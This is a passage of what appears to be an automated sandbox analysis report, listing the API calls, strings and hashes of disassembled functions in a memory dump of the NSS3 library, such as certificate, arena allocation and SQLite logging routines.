memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDE43
PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDE76
PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDF32
memcpy.VCRUNTIME140(-00000010,00000000,00000000,?,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDF5F
PORT_Alloc_Util.NSS3(00000004,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDF78
PORT_Alloc_Util.NSS3(00000010,00000000,?,?,?,00000000,?,6C5C7F4A,00000000,?,00000000,00000000), ref: 6C5DDFAA

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$memcpy$Valuemalloc
String ID:
API String ID: 1886645929-0
Opcode ID: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction ID: 66ed36b52dbee3c23072f9d31331926ec8d5be0dd8e0637e8489e27d54c854e0
Opcode Fuzzy Hash: fe8d88a349e5673cf738647205dd9f379d38853f63a25a7da66ce1962b66b1ea
Instruction Fuzzy Hash: 54819F716467078BFB148E1DCC903697696DB61388F22883AD919CAFE1D774E484CE2E

Function 6C5B3C60 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

PK11_GetCertFromPrivateKey.NSS3(?), ref: 6C5B3C76
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5B3C94

Part of subcall function 6C5A95B0: TlsGetValue.KERNEL32(00000000,?,6C5C00D2,00000000), ref: 6C5A95D2
Part of subcall function 6C5A95B0: EnterCriticalSection.KERNEL32(?,?,?,6C5C00D2,00000000), ref: 6C5A95E7
Part of subcall function 6C5A95B0: PR_Unlock.NSS3(?,?,?,?,6C5C00D2,00000000), ref: 6C5A9605

PORT_NewArena_Util.NSS3(00000800), ref: 6C5B3CB2
PORT_ArenaAlloc_Util.NSS3(00000000,000000AC), ref: 6C5B3CCA
memset.VCRUNTIME140(00000000,00000000,000000AC), ref: 6C5B3CE1

Part of subcall function 6C5B3090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5CAE42), ref: 6C5B30AA
Part of subcall function 6C5B3090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5B30C7
Part of subcall function 6C5B3090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5B30E5
Part of subcall function 6C5B3090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C5B3116
Part of subcall function 6C5B3090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5B312B
Part of subcall function 6C5B3090: PK11_DestroyObject.NSS3(?,?), ref: 6C5B3154
Part of subcall function 6C5B3090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5B317E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Arena_$Alloc_ArenaDestroyK11_memset$AlgorithmCertCertificateCopyCriticalEnterFreeFromItem_ObjectPrivateSectionTag_UnlockValue
String ID:
API String ID: 3167935723-0
Opcode ID: 25f703742c6ac03d91444aaef86e515a18b083017ec7a64862defc1d3938ab9a
Instruction ID: 2524ffa63a838b928ae0eda183e66dd4ebd63d260ca3696efef3b03f566f6922
Opcode Fuzzy Hash: 25f703742c6ac03d91444aaef86e515a18b083017ec7a64862defc1d3938ab9a
Instruction Fuzzy Hash: 9B61B571A00200ABEF105F65DC51FAB7AA9AF48748F484429FD05BAA52FB31D918C7A5

Function 6C5F3D40 Relevance: 13.7, APIs: 9, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 6C5F3440: PK11_GetAllTokens.NSS3 ref: 6C5F3481
Part of subcall function 6C5F3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5F34A3
Part of subcall function 6C5F3440: TlsGetValue.KERNEL32 ref: 6C5F352E
Part of subcall function 6C5F3440: EnterCriticalSection.KERNEL32(?), ref: 6C5F3542
Part of subcall function 6C5F3440: PR_Unlock.NSS3(?), ref: 6C5F355B

TlsGetValue.KERNEL32 ref: 6C5F3D8B
EnterCriticalSection.KERNEL32(?), ref: 6C5F3D9F
PR_Unlock.NSS3(?), ref: 6C5F3DCA
PR_SetError.NSS3(00000000,00000000), ref: 6C5F3DE2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C5F3E4F

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

TlsGetValue.KERNEL32 ref: 6C5F3E97
EnterCriticalSection.KERNEL32(?), ref: 6C5F3EAB
PR_Unlock.NSS3(?), ref: 6C5F3ED6
PR_SetError.NSS3(00000000,00000000), ref: 6C5F3EEE

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorValue$CriticalEnterSectionUnlock$K11_Tokens
String ID:
API String ID: 2554137219-0
Opcode ID: c4a72696b52632be9dde49750a636380e534f2121eb1a1e16f0eb5dc22b684c9
Instruction ID: fe2f9ef1cb374341e69a4e792848a83383fedf60132d562829392a869eaab429
Opcode Fuzzy Hash: c4a72696b52632be9dde49750a636380e534f2121eb1a1e16f0eb5dc22b684c9
Instruction Fuzzy Hash: 51512876A002009BFB15AF69DC8476A77B4EF45318F044568DE2987B12EB31E855CFD2

Function 6C5A2C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(CDC03278), ref: 6C5A2C5D

Part of subcall function 6C600D30: calloc.MOZGLUE ref: 6C600D50
Part of subcall function 6C600D30: TlsGetValue.KERNEL32 ref: 6C600D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C5A2C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A2CE0

Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5A2CDA,?,00000000), ref: 6C5A2E1E
Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C5A2E33
Part of subcall function 6C5A2E00: TlsGetValue.KERNEL32 ref: 6C5A2E4E
Part of subcall function 6C5A2E00: EnterCriticalSection.KERNEL32(?), ref: 6C5A2E5E
Part of subcall function 6C5A2E00: PL_HashTableLookup.NSS3(?), ref: 6C5A2E71
Part of subcall function 6C5A2E00: PL_HashTableRemove.NSS3(?), ref: 6C5A2E84
Part of subcall function 6C5A2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C5A2E96
Part of subcall function 6C5A2E00: PR_Unlock.NSS3 ref: 6C5A2EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5A2D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C5A2D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C5A2D3F
free.MOZGLUE(00000000), ref: 6C5A2D73
CERT_DestroyCertificate.NSS3(?), ref: 6C5A2DB8
free.MOZGLUE ref: 6C5A2DC8

Part of subcall function 6C5A3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A3EC2
Part of subcall function 6C5A3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A3ED6
Part of subcall function 6C5A3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A3EEE
Part of subcall function 6C5A3E60: PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A3F02
Part of subcall function 6C5A3E60: PL_FreeArenaPool.NSS3 ref: 6C5A3F14
Part of subcall function 6C5A3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A3F27

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 97e4b3b62b3f74b9a92e2f365c2009df81efda19692e70521d9508c3f0dcd503
Instruction ID: b62818a245d52610acf25a949f4bc1b8792be6edbcf833f74c929559e39de9f0
Opcode Fuzzy Hash: 97e4b3b62b3f74b9a92e2f365c2009df81efda19692e70521d9508c3f0dcd503
Instruction Fuzzy Hash: AD51D071604211ABDB10DFA7DC86B5F7BE5EF94308F14082CE85983A52E731E817CB92

Function 6C5A7CC0 Relevance: 13.6, APIs: 9, Instructions: 132threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5A40D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C5A3F7F,?,00000055,?,?,6C5A1666,?,?), ref: 6C5A40D9
Part of subcall function 6C5A40D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C5A1666,?,?), ref: 6C5A40FC
Part of subcall function 6C5A40D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C5A1666,?,?), ref: 6C5A4138

PR_GetCurrentThread.NSS3 ref: 6C5A7CFD

Part of subcall function 6C669BF0: TlsGetValue.KERNEL32(?,?,?,6C6B0A75), ref: 6C669C07

SECITEM_ItemsAreEqual_Util.NSS3(?,6C6C9030), ref: 6C5A7D1B

Part of subcall function 6C5FFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C5A1A3E,00000048,00000054), ref: 6C5FFD56

SECITEM_ItemsAreEqual_Util.NSS3(?,6C6C9048), ref: 6C5A7D2F
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6C5A7D50
PR_GetCurrentThread.NSS3 ref: 6C5A7D61
PORT_ArenaMark_Util.NSS3(?), ref: 6C5A7D7D
free.MOZGLUE(?), ref: 6C5A7D9C
CERT_CheckNameSpace.NSS3(?,00000000,00000000), ref: 6C5A7DB8
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C5A7E19

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$CurrentEqual_ErrorItem_ItemsThread$ArenaCheckCompareCopyFindMark_NameSpaceTag_Valuefreememcmp
String ID:
API String ID: 70581797-0
Opcode ID: e1b3251d999dee5ad1d52d7fbcc28d0aa7e937e5748dc19a19b24f0dfd115ac2
Instruction ID: 9fb4db8942999a18b92bb02bc06a9ec56614619bb6684c0dbe6552863cb6241b
Opcode Fuzzy Hash: e1b3251d999dee5ad1d52d7fbcc28d0aa7e937e5748dc19a19b24f0dfd115ac2
Instruction Fuzzy Hash: 6F41C672A001199BDB008FAA9C41BAF37E4AF9129CF050564EC15ABB55E730ED1ACBA5

Function 6C5B7EB0 Relevance: 13.6, APIs: 9, Instructions: 124threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?,00000000,00000000,?,?,?,6C5B80DD), ref: 6C5B7F15
DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,6C5B80DD), ref: 6C5B7F36
free.MOZGLUE(?,?,?,6C5B80DD), ref: 6C5B7F3D
SECOID_Shutdown.NSS3(00000000,00000000,?,?,?,6C5B80DD), ref: 6C5B7F5D
DeleteCriticalSection.KERNEL32(?,6C5B80DD), ref: 6C5B7F94
free.MOZGLUE(?), ref: 6C5B7F9B
PR_SetError.NSS3(FFFFE08B,00000000,6C5B80DD), ref: 6C5B7FD0
PR_SetThreadPrivate.NSS3(FFFFFFFF,00000000,6C5B80DD), ref: 6C5B7FE6
free.MOZGLUE(?,6C5B80DD), ref: 6C5B802D

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection$ErrorPrivateShutdownThread
String ID:
API String ID: 4037168058-0
Opcode ID: 8aa2d630fea73995817011b96c29ba049efbddd3ad143fd36056f8472394ea3b
Instruction ID: d082d8815ecfc5a75c1fe8b181697c7496a36502d870d85dfe5f2b95f7569b3d
Opcode Fuzzy Hash: 8aa2d630fea73995817011b96c29ba049efbddd3ad143fd36056f8472394ea3b
Instruction Fuzzy Hash: 4D4119F2B051009BDB10DFB99C89A4A7BB5AB873D8F14023DE516A7B41DF30D809CBA5

Function 6C5FFEE0 Relevance: 13.6, APIs: 9, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5FFF00

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PORT_ArenaMark_Util.NSS3(?), ref: 6C5FFF18
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C5FFF26
PORT_ArenaMark_Util.NSS3(?), ref: 6C5FFF4F
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C5FFF7A
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C5FFF8C

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_Mark_$ErrorValuememset
String ID:
API String ID: 1233137751-0
Opcode ID: 0757effd61fbaf56a3ab9227aee25e5703778d647cca76054a31c81da8daec8d
Instruction ID: 5d575b232471500adb7db1df0392c85ed5c0e2cfe536d67436e74b406b7529e0
Opcode Fuzzy Hash: 0757effd61fbaf56a3ab9227aee25e5703778d647cca76054a31c81da8daec8d
Instruction Fuzzy Hash: 8E3144B2A013129BF7148F588C40B9B76E8AF4634CF144238ED29A7F40EB31D915CBE9

Function 6C603CA0 Relevance: 13.6, APIs: 9, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C6038BD), ref: 6C603CBE
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,?,-00000001,?,00000000,?,6C6038BD), ref: 6C603CD1

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603CF0
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6DB369,000000FF,00000000,00000000,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603D0B
PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603D1A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,6C6DB369,000000FF,00000000,00000000,00000000,6C6038BD), ref: 6C603D38
_wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000), ref: 6C603D47
free.MOZGLUE(00000000), ref: 6C603D62
free.MOZGLUE(000000FF,?,000000FF,00000000,00000000,6C6038BD), ref: 6C603D6F

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ByteCharMultiWide$Alloc_Utilfree$Value_wfopenmalloc
String ID:
API String ID: 2345246809-0
Opcode ID: a9c358f945a4eb52bf1606839a0da63e25d046eb502e462774c3a73e095b6e96
Instruction ID: c94c2ff9b161e919d35d5e7b68fd9d94eef0964e16b2eac6914f795f6cf6732b
Opcode Fuzzy Hash: a9c358f945a4eb52bf1606839a0da63e25d046eb502e462774c3a73e095b6e96
Instruction Fuzzy Hash: E52108B570111237FB20667B5D59E7B39EDDF827A9F140235B939E7AC0EA60D800C2B9

Function 6C547D70 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E27
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C547E67
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001065F,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000003,?,?), ref: 6C547EED
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001066C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C547F2E

Strings

%s at line %d of [%.10s], xrefs: 6C547EE7, 6C547F28
database corruption, xrefs: 6C547EE2, 6C547F23
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C547ED8, 6C547F08, 6C547F19

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 228ba9411778a819a7327fb9bbaa2d7a37570207669a7c50fb207669ec8d5352
Instruction ID: 51af5abd4a427d5c564df0c6882e0530e46d5f79ffe9ae47f9901e5dd40be057
Opcode Fuzzy Hash: 228ba9411778a819a7327fb9bbaa2d7a37570207669a7c50fb207669ec8d5352
Instruction Fuzzy Hash: 7A61C170A042059FDB05CF25CC80FAA37B2BF85348F1589A9EC095BB52D731EC66CBA5

Function 6C52FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C52FE83

Part of subcall function 6C52FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C52FEFA
Part of subcall function 6C52FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C52FF3B

Strings

%s at line %d of [%.10s], xrefs: 6C52FD73, 6C52FE35
database corruption, xrefs: 6C52FD6E, 6C52FE30
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C52FD64, 6C52FE26

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: 341f6b5f9c70365e8e0856d326761a121268e223e7c41ab85b180933c151275b
Instruction ID: bd44b7d5005860a63d24b8f1fc5ef8cb52e0a3f8691fca6be519a930cbcfeda1
Opcode Fuzzy Hash: 341f6b5f9c70365e8e0856d326761a121268e223e7c41ab85b180933c151275b
Instruction Fuzzy Hash: AD518F71A00215DFDB04CFA9E890AAEB7F1FF48308F144169E905AB792E735EC51CBA4

Function 6C672F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C672FFD
sqlite3_initialize.NSS3 ref: 6C673007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C673032
sqlite3_mprintf.NSS3(6C6DAAF9,?), ref: 6C673073
sqlite3_free.NSS3(?), ref: 6C6730B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C6730C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C6730BB

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: d7bd2ae887a19dea170311d01e4419514c8e33ef26aed3643925db9ac9c15869
Instruction ID: 07c441ae2d2e0465ce7ff6e704effdbc13a8acfdf02b2560d820125fefcee313
Opcode Fuzzy Hash: d7bd2ae887a19dea170311d01e4419514c8e33ef26aed3643925db9ac9c15869
Instruction Fuzzy Hash: 7441C271600606EBDB10CF25D844A8AB7E5FF84368F148A38EC5987B40E731F995CBE4

Function 6C5F5ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]_l), ref: 6C5F5F0A
TlsGetValue.KERNEL32 ref: 6C5F5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C5F5F2F
